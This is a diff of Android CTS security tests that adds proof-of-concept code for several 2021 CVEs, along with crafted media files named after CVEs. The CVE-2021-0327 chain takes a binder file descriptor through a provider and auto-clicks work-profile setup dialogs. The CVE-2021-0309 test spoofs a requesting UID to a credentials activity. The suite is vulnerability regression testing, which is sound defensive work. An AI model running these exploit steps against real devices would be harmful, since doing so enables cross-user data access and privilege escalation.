diff --git a/tests/tests/provider/Android.bp b/tests/tests/provider/Android.bp
index 0ed0e87..bd78b24 100644
--- a/tests/tests/provider/Android.bp
+++ b/tests/tests/provider/Android.bp
@@ -12,6 +12,7 @@
test_suites: [
"cts",
"general-tests",
+ "sts",
],
libs: [
diff --git a/tests/tests/provider/preconditions/Android.bp b/tests/tests/provider/preconditions/Android.bp
index 71dd378..289aab5 100644
--- a/tests/tests/provider/preconditions/Android.bp
+++ b/tests/tests/provider/preconditions/Android.bp
@@ -14,6 +14,7 @@
test_suites: [
"cts",
"general-tests",
+ "sts"
],
host_supported: true,
device_supported: false,
diff --git a/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java b/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java
index d54e41d..7965549 100644
--- a/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java
+++ b/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java
@@ -37,6 +37,7 @@
import android.os.FileUtils;
import android.os.ParcelFileDescriptor;
import android.os.storage.StorageManager;
+import android.platform.test.annotations.SecurityTest;
import android.provider.MediaStore;
import android.provider.MediaStore.Files.FileColumns;
import android.provider.MediaStore.Video.Media;
@@ -254,6 +255,7 @@
}
}
+ @SecurityTest
@Test
public void testIsoLocationRedaction() throws Exception {
// STOPSHIP: remove this once isolated storage is always enabled
diff --git a/tests/tests/role/Android.bp b/tests/tests/role/Android.bp
index ca4939a..bb4c892 100644
--- a/tests/tests/role/Android.bp
+++ b/tests/tests/role/Android.bp
@@ -35,7 +35,7 @@
test_suites: [
"cts",
"general-tests",
- "mts",
+ "mts-permission",
],
data: [
diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp
index e79cd7e..2e0d0ef 100644
--- a/tests/tests/security/Android.bp
+++ b/tests/tests/security/Android.bp
@@ -31,6 +31,7 @@
"compatibility-common-util-devicesidelib",
"guava",
"platform-test-annotations",
+ "hamcrest-library",
],
libs: [
"android.test.runner",
@@ -57,6 +58,7 @@
"src/**/*.java",
"src/android/security/cts/activity/ISecureRandomService.aidl",
"aidl/android/security/cts/IIsolatedService.aidl",
+ "aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl",
],
//sdk_version: "current",
platform_apis: true,
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index ad23b07..31f4c59 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -102,6 +102,71 @@
<data android:mimeType="application/vnd.android.package-archive" />
</intent-filter>
</receiver>
+
+ <activity android:name="android.security.cts.CVE_2021_0339$FirstActivity"
+ android:label="TAT Anim1"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN"/>
+ <category android:name="android.intent.category.LAUNCHER"/>
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0339$SecondActivity"
+ android:label="TAT Anim2"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN"/>
+ <category android:name="android.intent.category.LAUNCHER"/>
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.IntroActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.OtherUserActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.TestActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.workprofilesetup.ProvisionedActivity">
+ <intent-filter>
+ <action android:name="android.app.action.PROVISIONING_SUCCESSFUL" />
+ <category android:name="android.intent.category.DEFAULT" />
+ </intent-filter>
+ </activity>
+
+ <receiver
+ android:name="android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN">
+ <meta-data
+ android:name="android.app.device_admin"
+ android:resource="@xml/device_admin" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+
+ <provider
+ android:name="android.security.cts.CVE_2021_0327.BadProvider"
+ android:authorities="android.security.cts.CVE_2021_0327.BadProvider"
+ android:exported="false"
+ android:grantUriPermissions="true"
+ android:process=":badprovider" />
+
</application>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/security/AndroidTest.xml b/tests/tests/security/AndroidTest.xml
index e9067908..6e0c8bc4 100644
--- a/tests/tests/security/AndroidTest.xml
+++ b/tests/tests/security/AndroidTest.xml
@@ -34,6 +34,16 @@
value="appops reset android.security.cts" />
</target_preparer>
+ <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
+ <option name="teardown-command"
+ value="pm remove-user 10" />
+ </target_preparer>
+
+ <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
+ <option name="teardown-command"
+ value="pm uninstall --user 0 android.security.cts" />
+ </target_preparer>
+
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
<option name="package" value="android.security.cts" />
<option name="runtime-hint" value="1h40m18s" />
diff --git a/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl
new file mode 100644
index 0000000..e71f2c8
--- /dev/null
+++ b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl
@@ -0,0 +1,10 @@
+// IBadProvider.aidl
+package android.security.cts.CVE_2021_0327;
+
+// Declare any non-default types here with import statements
+import android.os.ParcelFileDescriptor;
+interface IBadProvider {
+ ParcelFileDescriptor takeBinder();
+
+ oneway void exit();
+}
diff --git a/tests/tests/security/jni/Android.bp b/tests/tests/security/jni/Android.bp
index 5d5f6d1..e91965d 100644
--- a/tests/tests/security/jni/Android.bp
+++ b/tests/tests/security/jni/Android.bp
@@ -24,6 +24,7 @@
"android_security_cts_NativeCodeTest.cpp",
"android_security_cts_MMapExecutableTest.cpp",
"android_security_cts_EncryptionTest.cpp",
+ "android_security_cts_cve_2021_0394.cpp",
],
shared_libs: [
"libcrypto",
diff --git a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
index 7490d1a..06e57f1 100644
--- a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
+++ b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
@@ -22,6 +22,7 @@
extern int register_android_security_cts_SeccompTest(JNIEnv*);
extern int register_android_security_cts_MMapExecutableTest(JNIEnv* env);
extern int register_android_security_cts_EncryptionTest(JNIEnv* env);
+extern int register_android_security_cts_cve_2021_0394(JNIEnv* env);
jint JNI_OnLoad(JavaVM *vm, void *) {
JNIEnv *env = NULL;
@@ -46,5 +47,9 @@
return JNI_ERR;
}
+ if (register_android_security_cts_cve_2021_0394(env)) {
+ return JNI_ERR;
+ }
+
return JNI_VERSION_1_4;
}
diff --git a/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp
new file mode 100644
index 0000000..66b5792
--- /dev/null
+++ b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <jni.h>
+#include <string.h>
+
+static constexpr char kDefaultValue = 'x';
+static constexpr size_t kStringLength = 4096;
+
+jboolean android_security_cts_cve_2021_0394_poc(JNIEnv* env, jobject thiz) {
+ (void) thiz;
+ char array[kStringLength];
+ memset(array, kDefaultValue, kStringLength - 1);
+ array[kStringLength - 1] = 0;
+ jstring s = env->NewStringUTF(array);
+ jboolean isVulnerable = false;
+ char invalidChars[] = { '\xc0', '\xe0', '\xf0' };
+ for (int c = 0; c < sizeof(invalidChars) / sizeof(char); ++c) {
+ char invalid = invalidChars[c];
+ array[kStringLength - 2] = invalid;
+ s = env->NewStringUTF(array);
+ const char* UTFChars = env->GetStringUTFChars(s, nullptr);
+ if (UTFChars[kStringLength - 2] != '?') {
+ isVulnerable = true;
+ }
+ env->ReleaseStringUTFChars(s, UTFChars);
+ }
+ return isVulnerable;
+}
+
+static JNINativeMethod gMethods[] = { { "poc", "()Z",
+ (void*) android_security_cts_cve_2021_0394_poc }, };
+
+int register_android_security_cts_cve_2021_0394(JNIEnv* env) {
+ jclass clazz = env->FindClass("android/security/cts/CVE_2021_0394");
+ return env->RegisterNatives(clazz, gMethods,
+ sizeof(gMethods) / sizeof(JNINativeMethod));
+}
diff --git a/tests/tests/security/res/anim/translate1.xml b/tests/tests/security/res/anim/translate1.xml
new file mode 100644
index 0000000..da2ee56
--- /dev/null
+++ b/tests/tests/security/res/anim/translate1.xml
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<translate
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:fromYDelta="0%"
+ android:toYDelta="-100%"
+ android:interpolator="@android:anim/linear_interpolator"
+ android:duration="10000" />
diff --git a/tests/tests/security/res/anim/translate2.xml b/tests/tests/security/res/anim/translate2.xml
new file mode 100644
index 0000000..d4bc6d9
--- /dev/null
+++ b/tests/tests/security/res/anim/translate2.xml
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<translate
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:fromYDelta="100%"
+ android:toYDelta="0%"
+ android:interpolator="@android:anim/linear_interpolator"
+ android:duration="10000" />
diff --git a/tests/tests/security/res/raw/cve_2018_13925.ts b/tests/tests/security/res/raw/cve_2018_13925.ts
new file mode 100644
index 0000000..5365625
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_13925.ts
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_14013.mp4 b/tests/tests/security/res/raw/cve_2019_14013.mp4
new file mode 100644
index 0000000..2328751
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_14013.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_2245.ts b/tests/tests/security/res/raw/cve_2019_2245.ts
new file mode 100644
index 0000000..4952466
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_2245.ts
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_11122.mkv b/tests/tests/security/res/raw/cve_2020_11122.mkv
new file mode 100644
index 0000000..f0fa08f
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11122.mkv
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_11139.flac b/tests/tests/security/res/raw/cve_2020_11139.flac
new file mode 100644
index 0000000..3700ba9
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11139.flac
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_11168.mkv b/tests/tests/security/res/raw/cve_2020_11168.mkv
new file mode 100644
index 0000000..58bf85e
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11168.mkv
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3633.mp2 b/tests/tests/security/res/raw/cve_2020_3633.mp2
new file mode 100644
index 0000000..9c68044
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3633.mp2
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3658.mp4 b/tests/tests/security/res/raw/cve_2020_3658.mp4
new file mode 100644
index 0000000..a8ae316
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3658.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3660.mp4 b/tests/tests/security/res/raw/cve_2020_3660.mp4
new file mode 100644
index 0000000..9e0c1bf
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3660.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3661.mp4 b/tests/tests/security/res/raw/cve_2020_3661.mp4
new file mode 100644
index 0000000..e822179
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3661.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3662.mp4 b/tests/tests/security/res/raw/cve_2020_3662.mp4
new file mode 100644
index 0000000..4fd269e
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3662.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3663.mp4 b/tests/tests/security/res/raw/cve_2020_3663.mp4
new file mode 100644
index 0000000..54af26c
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3663.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3688.mp4 b/tests/tests/security/res/raw/cve_2020_3688.mp4
new file mode 100644
index 0000000..18ec0ad
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3688.mp4
Binary files differ
diff --git a/tests/tests/security/res/xml/device_admin.xml b/tests/tests/security/res/xml/device_admin.xml
new file mode 100644
index 0000000..5760898
--- /dev/null
+++ b/tests/tests/security/res/xml/device_admin.xml
@@ -0,0 +1,14 @@
+<?xml version ="1.0" encoding ="utf-8"?>
+<device-admin>
+ <uses-policies>
+<!-- <limit-password/>-->
+<!-- <watch-login/>-->
+<!-- <reset-password/>-->
+<!-- <force-lock/>-->
+<!-- <wipe-data/>-->
+<!-- <expire-password/>-->
+<!-- <encrypted-storage/>-->
+<!-- <disable-camera/>-->
+<!-- <disable-keyguard-features/>-->
+ </uses-policies>
+</device-admin>
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0309.java b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java
new file mode 100644
index 0000000..3f39a0e
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import static org.junit.Assert.assertFalse;
+
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.AccountManager;
+import android.accounts.GrantCredentialsPermissionActivity;
+import android.accounts.IAccountAuthenticatorResponse;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.RemoteException;
+import android.platform.test.annotations.SecurityTest;
+
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0309 {
+ private final Context mContext = InstrumentationRegistry.getContext();
+ boolean isVulnerable = true;
+
+ /**
+ * b/159145361
+ */
+ @SecurityTest(minPatchLevel = "2021-01")
+ @Test
+ public void testPocCVE_2021_0309() {
+ /**
+ * Output of adb shell pm list packages --user 0 -U com.android.providers.media
+ * package:com.android.providers.media uid:10008
+ */
+ final int REQUESTED_UID = 10008;
+ Intent intent = new Intent();
+ intent.setClassName("android",
+ "android.accounts.GrantCredentialsPermissionActivity");
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_ACCOUNT,
+ new Account("abc@xyz.org", "com.my.auth"));
+ intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_AUTH_TOKEN_TYPE,
+ AccountManager.ACCOUNT_ACCESS_TOKEN_TYPE);
+ intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_RESPONSE,
+ new AccountAuthenticatorResponse(new IAccountAuthenticatorResponse.Stub() {
+ @Override
+ public void onResult(Bundle value) throws RemoteException {
+ }
+
+ @Override
+ public void onRequestContinued() {
+ }
+
+ @Override
+ public void onError(int errorCode, String errorMessage) throws RemoteException {
+ /**
+ * GrantCredentialsPermissionActivity's onCreate() should not execute and
+ * should return error when the requested UID does not match the process's UID
+ */
+ isVulnerable = false;
+ }
+ }));
+
+ intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_REQUESTING_UID,
+ REQUESTED_UID);
+ mContext.startActivity(intent);
+ /**
+ * Sleep for 5 seconds to ensure that the AccountAuthenticatorResponse callback gets
+ * triggered if vulnerability is fixed.
+ */
+ try {
+ Thread.sleep(5000);
+ } catch (Exception e) {
+ }
+ assertFalse(isVulnerable);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java b/tests/tests/security/src/android/security/cts/CVE_2021_0322.java
deleted file mode 100644
index 2233005..0000000
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java
+++ /dev/null
@@ -1,80 +0,0 @@
-/*
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package android.security.cts;
-
-import static org.junit.Assert.assertTrue;
-
-import android.app.PendingIntent;
-import android.content.Context;
-import android.content.Intent;
-import android.content.pm.ProviderInfo;
-import android.net.Uri;
-import android.os.Bundle;
-
-import androidx.test.InstrumentationRegistry;
-import androidx.test.runner.AndroidJUnit4;
-
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import android.platform.test.annotations.SecurityTest;
-
-@RunWith(AndroidJUnit4.class)
-public class CVE_2021_0322 {
-
- private static final Uri BASE_URI = Uri.parse("content://android.security.cts.local/main");
- private final Context mContext = InstrumentationRegistry.getContext();
-
- boolean isVulnerable = false;
- boolean onFinishedExecuted = false;
-
- /**
- * b/159145361
- */
- @SecurityTest(minPatchLevel = "2021-01")
- @Test
- public void testPocCVE_2021_0322() {
- CVE_2021_0322_SliceProvider serviceProvider = new CVE_2021_0322_SliceProvider();
- serviceProvider.attachInfo(mContext, new ProviderInfo());
- PendingIntent pi = serviceProvider.onCreatePermissionRequest(BASE_URI);
- PendingIntent.OnFinished onFinish = new PendingIntent.OnFinished() {
- public void onSendFinished(PendingIntent pi, Intent intent,
- int resultCode, String resultData, Bundle resultExtras) {
- String packageName = intent.getStringExtra("provider_pkg");
- if(packageName != null) {
- isVulnerable = true;
- }
- onFinishedExecuted = true;
- }
- };
- /* Execute the intent - the result is not required as the focus is */
- /* the intent which was used. Hence ignore the exceptions. */
- try {
- pi.send(0, onFinish, null);
- } catch (Exception e) {
- }
- /* Wait till the intent finishes. PendingIntent.OnFinished would be */
- /* exectuted and the details of the intent which was executed would */
- /* checked. */
- try {
- while(!onFinishedExecuted) {
- Thread.sleep(1000); //Sleep for 1 second
- }
- assertTrue(!isVulnerable);
- } catch (Exception e) {
- }
- }
-}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java
new file mode 100644
index 0000000..d0b6cad
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java
@@ -0,0 +1,76 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.Cursor;
+import android.net.Uri;
+import android.os.Bundle;
+import android.os.ParcelFileDescriptor;
+import android.os.Process;
+import android.os.RemoteException;
+import android.system.ErrnoException;
+import android.system.Os;
+
+import java.io.IOException;
+
+public class BadProvider extends ContentProvider {
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public Bundle call(String method, String arg, Bundle extras) {
+ if ("get_aidl".equals(method)) {
+ Bundle bundle = new Bundle();
+ bundle.putBinder("a", new IBadProvider.Stub() {
+ @Override
+ public ParcelFileDescriptor takeBinder() throws RemoteException {
+ for (int i = 0; i < 100; i++) {
+ try {
+ String name = Os.readlink("/proc/" + Process.myPid() + "/fd/" + i);
+ // Log.v("TAKEBINDER", "fd=" + i + " path=" + name);
+ if (name.startsWith("/dev/") && name.endsWith("/binder")) {
+ return ParcelFileDescriptor.fromFd(i);
+ }
+ } catch (ErrnoException | IOException e) {
+ }
+ }
+ return null;
+ }
+
+ @Override
+ public void exit() throws RemoteException {
+ System.exit(0);
+ }
+ });
+ return bundle;
+ }
+ return super.call(method, arg, extras);
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {
+ return null;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ return null;
+ }
+
+ @Override
+ public Uri insert(Uri uri, ContentValues values) {
+ return null;
+ }
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ return 0;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
+ return 0;
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java
new file mode 100644
index 0000000..56408ee
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+import android.util.Log;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.InstrumentationRegistry;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+@SecurityTest
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0327 {
+
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static final String TAG = "CVE_2021_0327";
+ public static boolean testActivityRequested;
+ public static boolean testActivityCreated;
+ public static String errorMessage = null;
+
+ private void launchActivity(Class<? extends Activity> clazz) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ /**
+ * b/175817081
+ */
+ @Test
+ @SecurityTest
+ public void testPocCVE_2021_0327() throws Exception {
+ Log.d(TAG, "test start");
+ testActivityCreated=false;
+ testActivityRequested=false;
+ launchActivity(IntroActivity.class);
+ synchronized(CVE_2021_0327.class){
+ if(!testActivityRequested) {
+ Log.d(TAG, "test is waiting for TestActivity to be requested to run");
+ CVE_2021_0327.class.wait();
+ Log.d(TAG, "got signal");
+ }
+ }
+ synchronized(CVE_2021_0327.class){
+ if(!testActivityCreated) {
+ Log.d(TAG, "test is waiting for TestActivity to run");
+ CVE_2021_0327.class.wait(10000);
+ Log.d(TAG, "got signal");
+ }
+ }
+ Log.d(TAG, "test completed. testActivityCreated=" + testActivityCreated);
+ if(errorMessage != null){
+ Log.d(TAG, "errorMessage=" + errorMessage);
+ }
+ assertTrue(errorMessage==null);
+ assertFalse(testActivityCreated);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java
new file mode 100644
index 0000000..fd2af3a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java
@@ -0,0 +1,129 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.app.AlertDialog;
+import android.app.admin.DevicePolicyManager;
+import android.content.ClipData;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Bundle;
+import android.view.View;
+import android.util.Log;
+import android.os.SystemClock;
+
+//import android.support.test.InstrumentationRegistry;
+import androidx.test.InstrumentationRegistry;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import java.io.*;
+import java.util.stream.Collectors;
+
+import android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver;
+
+public class IntroActivity extends Activity {
+
+ private static final int AR_WORK_PROFILE_SETUP = 1;
+ private static final String TAG = "CVE_2021_0327";
+
+ private void launchOtherUserActivity() {
+ Log.d(TAG,"launchOtherUserActivity()");
+ Intent intent = new Intent(this, OtherUserActivity.class);
+ intent.setClipData(new ClipData("d", new String[]{"a/b"}, new ClipData.Item(Uri.parse("content://android.security.cts.CVE_2021_0327.BadProvider"))));
+ intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
+ startActivity(intent);
+ finish();
+ }
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d(TAG,"IntroActivity.OnCreate()");
+ if (isProfileOwner()) {
+ } else if (canLaunchOtherUserActivity()) {
+ launchOtherUserActivity();
+ } else {
+ setupWorkProfile(null);
+
+ //detect buttons to click
+ boolean profileSetUp=false;
+ String button;
+ java.util.List<UiObject2> objects;
+ UiDevice mUiDevice = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation());
+ BySelector selector = By.clickable(true);
+
+
+ while(!profileSetUp){
+ do {
+ Log.i(TAG, "waiting for clickable");
+ SystemClock.sleep(3000);
+ } while((objects = mUiDevice.findObjects(selector)).size()==0);
+ for(UiObject2 o : objects){
+ button=o.getText();
+ Log.d(TAG,"button:" + button);
+
+ if(button==null){
+ continue;
+ }
+
+ switch(button){
+ case "Delete" :
+ o.click();
+ Log.i(TAG, "clicked: Delete");
+ break;
+ case "Accept & continue" :
+ o.click();
+ Log.i(TAG, "clicked: Accept & continue");
+ break;
+ case "Next" :
+ o.click();
+ profileSetUp=true;
+ Log.i(TAG, "clicked: Next");
+ break;
+ default :
+ continue;
+ }
+ break;
+ }
+ }
+ //end while(!profileSetUp);
+ }
+ }
+
+ private boolean isProfileOwner() {
+ return getSystemService(DevicePolicyManager.class).isProfileOwnerApp(getPackageName());
+ }
+
+ private boolean canLaunchOtherUserActivity() {
+ Intent intent = new Intent("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY");
+ return (getPackageManager().resolveActivity(intent, 0) != null);
+ }
+
+ public void setupWorkProfile(View view) {
+ Log.d(TAG, "setupWorkProfile()");
+ Intent intent = new Intent(DevicePolicyManager.ACTION_PROVISION_MANAGED_PROFILE);
+ intent.putExtra(
+ DevicePolicyManager.EXTRA_PROVISIONING_DEVICE_ADMIN_COMPONENT_NAME,
+ new ComponentName(this, AdminReceiver.class)
+ );
+ startActivityForResult(intent, AR_WORK_PROFILE_SETUP);
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+ Log.d(TAG, "onActivityResult()");
+ if (requestCode == AR_WORK_PROFILE_SETUP) {
+ if (resultCode == RESULT_OK) {
+ launchOtherUserActivity();
+ } else {
+ new AlertDialog.Builder(this)
+ .setMessage("Work profile setup failed")
+ .setPositiveButton("ok", null)
+ .show();
+ }
+ }
+ super.onActivityResult(requestCode, resultCode, data);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java
new file mode 100644
index 0000000..3ed38de
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java
@@ -0,0 +1,94 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.annotation.SuppressLint;
+import android.app.Activity;
+import android.app.AlertDialog;
+import android.net.Uri;
+import android.os.AsyncTask;
+import android.os.Bundle;
+import android.os.Handler;
+import android.os.IBinder;
+import android.os.ParcelFileDescriptor;
+import android.os.ResultReceiver;
+import android.view.View;
+import android.util.Log;
+import java.io.File;
+import java.io.FileDescriptor;
+import java.io.*;
+import java.util.stream.Collectors;
+import java.util.concurrent.TimeUnit;
+import android.os.SystemClock;
+
+public class OtherUserActivity extends Activity {
+
+ static ParcelFileDescriptor sTakenBinder;
+ private static final String TAG = "CVE_2021_0327";
+ String errorMessage = null;
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
